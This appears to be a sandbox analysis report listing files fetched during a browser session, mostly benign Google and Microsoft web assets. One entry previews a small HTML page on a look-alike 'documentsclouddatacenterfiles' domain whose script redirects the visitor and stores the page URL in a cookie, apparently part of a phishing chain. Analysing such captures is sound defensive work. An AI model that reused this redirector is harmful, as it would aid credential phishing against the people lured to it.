                                                          SHA-512:6655E0426EB0C78A7CB4D4216A3AF7A6EDD50ABA8C92316608B1F79B8FC15F895CBA9314BEB7A35400228786E2A78A33E8C03322DA04E0DA94C2F109241547E8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2
                                                          Preview:wOF2.......`......~....................................D.`..........,..t..X..6.$..p. ..z. [.\.M.B.....-..VT .&"..Qc.=.U..XwD...7Q.v.a.*.; (...I........+.I..%...._.v.:..N.Y....;J.V...+..S..9Z...X.J........_0)c`[vb?.".P.E..Q......."p.v..........3.Zm`k":8..Kk........UR%U2...<....'a.L.4.&....P.X...,z5.j<++....ff..X1I.......%.Z<.UT.G.)L........;.A....O~ev...-z....^.|.....pE..@.t.7...4..>...}.U[y...O8....|m.L04....t...g...../...&.E...."...q.1.(..g.&?;...Vx..|.-p=......;...a..Q|*L8..}..$.*I*.2.tI8...O..Q...k+;..N.hf.M...t..(..\...O.......:n.... v..}H...|B<..'..r...1..B, .....6.&...6.x.i.=...r......Os.._...g.{W$VD..A1........B[.<un...t......k..n0........ ..O&.....%.@..c..Tv...pT.Np...U...%j+ZP....@.....b..........~...f..D..... ...O$....|......$W842...S.....2.pIL.....Z.[.xo.r.{.d)I.P.-)0..K.`.~,.8..[...m..3d....A..v.s.d..KW..j.4.Ic.m..,.P........../W.j...>B..BJ.........[?.....$."...-...K.P.R..K.....Dz(..7_...=.....b.C...2..4F.+....P...f.#.q.G.G8.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2343)
                                                          Category:downloaded
                                                          Size (bytes):52916
                                                          Entropy (8bit):5.51283890397623
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.google-analytics.com/analytics.js
                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):15552
                                                          Entropy (8bit):7.983966851275127
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                          SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                          SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                          SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                          Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):15344
                                                          Entropy (8bit):7.984625225844861
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                          SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                          SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                          SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                          Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65437)
                                                          Category:downloaded
                                                          Size (bytes):1047618
                                                          Entropy (8bit):5.056342375360382
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:0B8C40A3C2F8D974CB9B6C63A01E51FC
                                                          SHA1:39CF7464BBC20D090BFF28D71FC4DA94A019FB36
                                                          SHA-256:DFBD0D962687B64C57F18B0E9F6235CD6F069C7924C20ABB7CDECBE871AAF082
                                                          SHA-512:3D8B6DF0F25BAF5F7F2D9FCBE5FD4B171EA85C5E021B2FC05AEE42ED6CEEE02E0F0869A5B9A0AD4A5A355E0497AC0D93D3976C85712B03C1F22CDA0D281A5035
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://ssl.gstatic.com/datastudio/cloud-lego-fe.fe-server_20250210.00_p7/css/css.css?cb=729158798
                                                          Preview:/*!. * AngularJS Material Design. * https://github.com/angular/material. * @license MIT. * v1.1.20. */body,html{height:100%;position:relative}body{margin:0;padding:0}[tabindex="-1"]:focus{outline:none}.inset{padding:10px}a.md-no-style,button.md-no-style{font-weight:400;background-color:inherit;text-align:left;border:none;padding:0;margin:0}button,input,select,textarea{vertical-align:baseline}button,html input[type=button],input[type=reset],input[type=submit]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[type=button][disabled],input[type=reset][disabled],input[type=submit][disabled]{cursor:default}textarea{vertical-align:top;overflow:auto}input[type=search]{-webkit-appearance:textfield;box-sizing:content-box;-webkit-box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}input:-webkit-autofill{text-shadow:none}.md-visually-hidden{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):613
                                                          Entropy (8bit):4.342366119678695
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BBDE6B99C91338B3BB132C31CC348C53
                                                          SHA1:FD23A85ADB0E64D0E05A3A75BF0D1E8DD1B04D87
                                                          SHA-256:36AE35DB25608504944D4DC0405D8637FD3BE6DBFE1F77B67EB96C048F4AE147
                                                          SHA-512:DD0D5C0B60C1C945E6CE8FD7AE4FCF86048B8083A5B99E3C068875331E15C4CF8E506777C6D5B4340BFFAF4E0BE57DA4A397B0F02ADD3F5ED50509508D8E3094
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://view.documentsclouddatacenterfiles.com/SNSLED
                                                          Preview:. <!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <script>. window.onload = function() {. window.location.href = 'https://documentsclouddatacenterfiles.com/EyIqNHAA';. };. . const sddsditeLink = window.location.href;. document.cookie = "errorurl=" + sddsditeLink + "; path=/; domain=.documentsclouddatacenterfiles.com;";. </script>. </head>. <body>. </body>. </html>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (557)
                                                          Category:dropped
                                                          Size (bytes):191229
                                                          Entropy (8bit):5.638035058179321
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7B629B234A97E0101BC13991CA1639CB
                                                          SHA1:7B80B5BD1C1C79BE6DDB06BA4188E13EE9689455
                                                          SHA-256:FD61C0B627AFEB17ECFDB6E43A81FB4DA4D4F38AA6CC3B299533109CAF8B4EB2
                                                          SHA-512:523D1A8B3D8467C0C813DBDA25333D59265766BDD8FFDDB50A7FF5C27F2DB2A46D1474C82D59D2D05498BD14F54DF57FC208367262878B8CA178027DE9065304
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Nya,XB,Oya,Pya,Qya,Sya,Tya,Vya,dC,eC,fC,Wya,hC,kC,mC,nC,oC,Yya,Zya,$ya,qC,sC,tC,bza,cza,uC,dza,eza,gza,xC,iza,yC,kza,zC,mza,lza,nza,oza,pza,qza,rza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,DC,Iza,FC,Jza,Kza,Lza,Mza,Nza,Oza,Pza,Qza,Rza,Sza,Tza,Vza,Xza,Zza,aAa,cAa,eAa,gAa,iAa,kAa,mAa,nAa,oAa,pAa,qAa,rAa,sAa,tAa,GC,uAa,vAa,wAa,xAa,yAa,zAa,AAa,CAa,IC,JC,DAa,EAa,FAa,GAa,HAa,IAa,JAa,KAa,KC,LC,LAa,MAa,NAa,OAa,PAa,MC,QAa,RAa,NC,SAa,TAa,UAa,VAa,WAa,XAa,YAa,ZAa,$Aa,aBa,bBa,cBa,dBa,eBa,fBa,.gBa,hBa,iBa,jBa,lBa,mBa,nBa,pBa,rBa,uBa,vBa,xBa,ABa,BBa,CBa,DBa,jD,kD,FBa,mD,nD,oD,HBa,IBa,JBa,rD,sD,uD,vD,KBa,LBa,wD,NBa,OBa,xD,QBa,VBa,WBa,CD,$Ba,dCa,eCa,fCa,FD,gCa,hCa,jCa,kCa,lCa,mCa,nCa,ID,pCa,uCa,QD,xCa,wCa,RD,yCa,TD,ACa,mE,BCa,DCa,FCa,sE,GCa,tE,HCa,ICa,JCa,KCa,vE,MCa,LCa,NCa,PCa,RCa,TCa,XCa,VCa,YCa,WCa,wE,xE,aDa,bDa,yE,zE,AE,CE,DE,EE,dDa,GE,HE,eDa,IE,fDa,JE,KE,gDa,LE,ME,hDa,NE,
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (582)
                                                          Category:downloaded
                                                          Size (bytes):5739461
                                                          Entropy (8bit):5.507790829718403
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:87B9756C60D4901D5032023C7F3465A5
                                                          SHA1:04C54A8E0920A100028EAAEB62AFB8FBFFEDD174
                                                          SHA-256:331074D4933785D1B23C3F60832B2B82FFA57301A719E51FF4AD33720F410781
                                                          SHA-512:3C35B3D6A62E167AAB25314C288DA5E6BC0447B7D46AD53AAAB78B4C75164BC88A3D6B312EB29ADC4D8A66F1266745EFC91F7504F7A218D9A839C3517F83B88C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/_/datastudio/_/js/k=datastudio.datastudio.en_US.tytJGKF--yA.2018.O/am=AAQ/d=1/rs=AHAPuoNgmn8nHiFxpdI-zUWawNUWuKyBCA/m=pm_base
                                                          Preview:"use strict";this.default_datastudio=this.default_datastudio||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x400, ]);./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*... Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors. Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at. http://www.apache.org/licenses/LICENSE-2.0. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                          Category:dropped
                                                          Size (bytes):673
                                                          Entropy (8bit):7.6596900876595075
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:0E176276362B94279A4492511BFCBD98
                                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 160 x 160, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):4811
                                                          Entropy (8bit):7.9323475501953675
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:CB13B37D9CEB24A98DDA6AFD6EDA0C39
                                                          SHA1:A42E3AFB3223A2892FA9483B2F4CCD3596EF6EB0
                                                          SHA-256:A3941E483EF88CF0299266CDB18200770144A15C836C9B40E7052AE0F2E0DC44
                                                          SHA-512:E3ADE17BA828ABAF67CFDDA89E194E40B53087F67B44A7FBAC3B3B37B322DE576AA260147B1FF8DA74A5A6D15CE957EDFACC477286F199686CCB31CED52CFB25
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://ssl.gstatic.com/datastudio/latest/static_images/pngs/favicon_looker_studio.png
                                                          Preview:.PNG........IHDR...............g-....pHYs..,K..,K..=......sRGB.........gAMA......a....`IDATx...o..q.^.h...&..``e.r.......S..K-.[$...H>H.-.]s.Y.K`I.ve_...":..gsI....AN>.e/..a..(Q.t...59....._w..@. {H..w...W.`...V.Z*.3........_v.C}.1z.|.Ti.,#A.....pU....a....eqw..........[qJ.5.&.~....{....+..t...... `..'..`..+.!.._.....G.%..p..[4..M.,........&X@....G.f...A.k`....]/ ].d.<~......V.}.......+w.{..{'J.\$...`{.C.x.,v.....m......J.g..=...u..Bm`p...K......<............xj.^{i.%....(8V...C.....%..,B.tw.7.@...<....w..5..DJ.1.{9.[Pp...A.qWx...!a+.fCRd..-.b.x..j.x7.v.C.:.....+.. .......6q..:..X*mB...<./`..Y|.O....NFE......N...{.W9.I...........D|.*iT>.u..........//...+.......9.p._.l..{.._-I...z.....I...o,W..mnQ.T...c8.;:..dK. .....tN.>zE).Z......K........R,Q.79.6N|..;.U]S..p*...).dG.....@!n..SV.....C....B...L&..V:.F..BY...{.....0...koM=....Ry..\.K......W..`..s.$.......b...x..#.......)......]..{d...Z1..~..o..A.pF..{.Y+.........@..,M.Z..@.(D.........Q.8E.H.x..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                          Category:dropped
                                                          Size (bytes):17174
                                                          Entropy (8bit):2.9129715116732746
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2347)
                                                          Category:downloaded
                                                          Size (bytes):8757517
                                                          Entropy (8bit):5.583481819379872
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E3D0200B7A0799288F342DC4804AD32A
                                                          SHA1:EA56C8772641611BE28265113B62401C0C224C4B
                                                          SHA-256:EEFE4F4D8242552670A5978BAB26986D93912004D76A16D9C81CA937AF38D578
                                                          SHA-512:F50DF81C4D274527DC6028385F4826D774A49906A2DDD23C5E8DE17DCCB8E6E66209D913955F3CB148F9BC3B369C6278575576C0C526C2E3BB39EB4E58564C40
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:"https://www.gstatic.com/_/datastudio/_/js/k=datastudio.datastudio.en_US.tytJGKF--yA.2018.O/am=AAQ/d=0/rs=AHAPuoNgmn8nHiFxpdI-zUWawNUWuKyBCA/m=syl,sy1r,syk,syx,sy1i,sy1j,sy1q,sy1k,syt,sym,sy1l,syj,sy1s,syz,syy,sy1h,sya,syq,syg,sy1d,sy1e,sy3,sy5,sy7,sy1b,syf,sy10,sy11,sy19,syh,syd,syi,sy1t,sy23,sy6,sy1w,sy8,sy14,sy1m,sy1n,sy1f,sy1x,sy1y,sy1z,sy29,sy1g,sy21,sy22,syw,sy24,sy20,sy4,sy13,sy17,sy1c,sy28,sys,sy1u,syo,sy15,sy1p,syn,sy0,sy2,sy9,syc,sye,syp,sy12,sy18,sy1a,sy16,syv,sy1v,sy25,sy1o,sy27,sy2a,sy2b,sy1,sy2j,sy2u,sy2v,sy2g,sy2w,syr,sy2t,sy2m,sy2f,sy2q,sy2x,sy2d,sy2z,sy2l,syu,sy26,sy2c,sy2e,sy2h,sy2k,sy2n,sy2r,sy30,sy3k,sy3l,sy3m,sy3n,sy3o,sy3p,pm_ng2report"
                                                          Preview:"use strict";this.default_datastudio=this.default_datastudio||{};(function(_){var window=this;.try{.var lg_tac,lg_uac,lg_sac;_.lg_DL=function(a,b,c){return Math.abs(a-b)<=(c||1E-6)};._.lg_EL=function(a,b){if(a instanceof _.lg_EL)this.ma=a.toArray();else{var c;if(c=_.lg_Aa(a))a:{for(var d=c=0;d<a.length;d++){if(!_.lg_Aa(a[d])||c>0&&a[d].length!=c){c=!1;break a}for(var e=0;e<a[d].length;e++)if(typeof a[d][e]!=="number"){c=!1;break a}c==0&&(c=a[d].length)}c=c!=0}if(c)this.ma=_.lg_za(a);else if(a instanceof _.lg_qn)this.ma=lg_sac(a.height,a.width);else if(typeof a==="number"&&typeof b==="number"&&a>0&&b>0)this.ma=lg_sac(a,b);else throw Error("Invalid argument(s) for Matrix contructor");.}this.ea=new _.lg_qn(this.ma[0].length,this.ma.length)};lg_tac=function(a,b,c){for(var d=0;d<a.getSize().height;d++)for(var e=0;e<a.getSize().width;e++)b.call(c,a.ma[d][e],d,e,a)};lg_uac=function(a,b){var c=new _.lg_EL(a.getSize());lg_tac(a,function(d,e,f){c.ma[e][f]=b.call(void 0,d,e,f,a)});return c};lg_sa
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                          Category:downloaded
                                                          Size (bytes):35169
                                                          Entropy (8bit):7.993210932978764
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:57EADECAC2A031883A702F6B12A14502
                                                          SHA1:3C1E4F5ABE11775DD678085EAC97029DF618A9F7
                                                          SHA-256:C76276A58DFB0E4D68D277526E5F05EE357E13957B4C91BE2C74BE7CD20B065E
                                                          SHA-512:D98AC263512C6CDB0A522C8B550F4CA8B901F620A1ED416C49163B28E0D5D08EA9605BF681F9F0C5567EB244BBD319D6596C6B46E860F48AD5CE31154DD2CA5A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_c4928fb5cff147a39780.js
                                                          Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:{...r..._........,...A........:..x.>.y..u.....N..f...).......<?._.f..C.....%..@..~....`P../.Q4..IQ.' ...e)'.q..Y:...%.z..x..k.z.../....@.D.r?......GP....`..o.'..~1.....&.HJ.`.@.}mV../8.b.m..guo.H_.7Qv.....dQ.....-.NE......G:.U'.....~.1.....H.k...O..dk.d.|.7..x\/..i^.Y..Q_/.`..i.&...-.......P...yEv....,....'.^...X.......YK.".....l.r.ax.....<...1!..4GQ.M_.....L..F..51.!.....].....y...(...=O5?.nT...~
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):208
                                                          Entropy (8bit):4.842603365022462
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:24F52E64BD023C875DA4494489744F94
                                                          SHA1:30A099CF87FE18074B557208BE35D7448614A004
                                                          SHA-256:A910A1F071E7D288803F9516FD5A312EB9FE1037BC9C4A8575CEDA66F26E5136
                                                          SHA-512:EEE11B4D31C5C7A7DCCFC91FF49F905910EFAF05D092DB74E4E4D9648B500621B0CE7959B6C1D5D6A4A6EEDBD94593C25FFBDA1CF531CCF05E7CD0DA43F72D4B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/images/icons/material/system_gm/svg/slideshow_24px.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M10 8v8l5-4-5-4zm9-5H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H5V5h14v14z"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):2296
                                                          Entropy (8bit):4.748928998041886
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A5094F02C58CE1717567011183FE9B90
                                                          SHA1:1245F6CDE13A5AF43FA830C9EFB98595E8DBC62D
                                                          SHA-256:A0CC7CDE1EDB5A36BB53610955A1210237588E8F45D0C4AE24C9BCEA9CB485E0
                                                          SHA-512:94A6A312901279A048EC0E4F7BFF8873BDA54F229507C3F1EBDB7A22AD89BEDAD46D1BB0E434DD9DE93B18268EBC202D3A668AE437786A37A6797D9EBC609B93
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://firestore.googleapis.com/google.firestore.v1.Firestore/Listen/channel?gsessionid=aIDX_KJI752Hl5GAa2UP7P499GqPCIC8ua3ksODYMiY&VER=8&database=projects%2Fdatastudio-prod-firestore%2Fdatabases%2F(default)&RID=rpc&SID=ISrJvnw1goQoUmBeCkVJKw&AID=0&CI=0&TYPE=xmlhttp&zx=j7sv6jo2c4cp&t=1
                                                          Preview:1636.[[1,[{. "targetChange": {. "targetChangeType": "ADD",. "targetIds": [. 2. ]. }.}.]],[2,[{. "documentChange": {. "document": {. "name": "projects/datastudio-prod-firestore/databases/(default)/documents/report/`AMVsmzZNL5UgjM3tqOyJpSfNQ285CIGKkxCV42MWQi8urMC2ScZ29feJjDUunx6Ee93QZBCKVqlb`",. "fields": {. "publishedRevisionNumber": {. "integerValue": "0". },. "pages": {. "mapValue": {. "fields": {. "pp_4gb3na7ypd": {. "mapValue": {. "fields": {. "id": {. "stringValue": "p_4gb3na7ypd". },. "version": {. "integerValue": "1740421311236". }. }. }. }. }. }. },. "version": {. "integerValue": "1740420645255". },. "id": {. "stringValue": "`AMVsm
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (3445), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):3447
                                                          Entropy (8bit):5.1147634913081745
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:ACDEC8DAD3164FBA20E86D50F1B979F1
                                                          SHA1:0C5FD1CCA5BECDB0080D20E6A90CCD91BC0D5894
                                                          SHA-256:1D2CDE2E778A731CBD158758F735E1BCC2508A8252720D261D94068AFF45AACC
                                                          SHA-512:A9D25D79EDF7BD8D668D5833263461B72B077AD3885A05DE749C7F0326BFC7C8D5D2D967E11FF40E52755211774DEC0E913532BC86AEEEC37B243A213CECEEC1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://login.live.com/Me.htm?v=3
